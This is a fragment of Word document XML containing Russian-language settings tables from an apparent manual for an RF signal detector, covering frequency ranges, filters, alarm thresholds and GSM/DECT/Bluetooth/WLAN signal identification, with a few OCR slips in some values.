          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Включение/выключение отображения изменения уровня сигнала в зависимо</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:softHyphen/>
              <w:t>сти от времени, а так же задание отображаемого временного интервала — 30сек/2мин/10мин/20 или бОмин</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1853"/>
        <w:gridCol w:w="3686"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="1842"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9082" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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Диапазон</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1853" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Опция</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842"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Установки по умолчанию</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1853" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Частотный</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>диапазон</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Выбор частотного диапазона</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Диапазон 1 Вкл./выкл.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842"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blPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1853" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Вкл./выкл. ФНЧ фильтра</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Диапазон 2 Вкл./выкл.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842"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blPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1853" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>ФНЧ Вкл./выкл.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842"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Не выбрано</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1853"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r w:rsidRPr="00DD0245">
              <w:t>Частотомер</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>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t>Выбор приоритета между измерением частоты и идентификацией стандартов передачи данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701"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r w:rsidRPr="00DD0245">
              <w:t>От 1 до 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B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="955"/>
        <w:gridCol w:w="5151"/>
        <w:gridCol w:w="2126"/>
        <w:gridCol w:w="1559"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9791" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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Монитор</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="955" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Опция</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5151" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Значение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559"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Установки</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>по</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>умолчанию</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="955" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:t>Уст.события - установка события, по которому осуществляется индикация тревоги</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5151" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Уровень тревоги</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Установка относительного порогового уровня тре</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:softHyphen/>
              <w:t>воги</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t xml:space="preserve">От 1 до 60 </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:t xml:space="preserve">В с шагом 1 </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>dB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559"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2 ОД б</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="955" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5151" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Захват частоты</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Индикакция значения частоты</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Выбрано/Не выбрано</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559"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blPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="955" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5151" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Сигнал</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t xml:space="preserve">Индикация идентифицированного сигнала </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>GSM</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>DECT</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>BLUETOOTH</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>WLAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Выбрано/Не выбрано</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559"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blPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="955" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:textDirection w:val="btLr"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5151" w:type="dxa"/>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t>Задержка события</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Установка длительности между событиями, которые будут записаны в протокол, как два разных события</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>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t>Установка от 1 до 1 2 Осек с шагом 1 сек</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5DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>8 сек</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
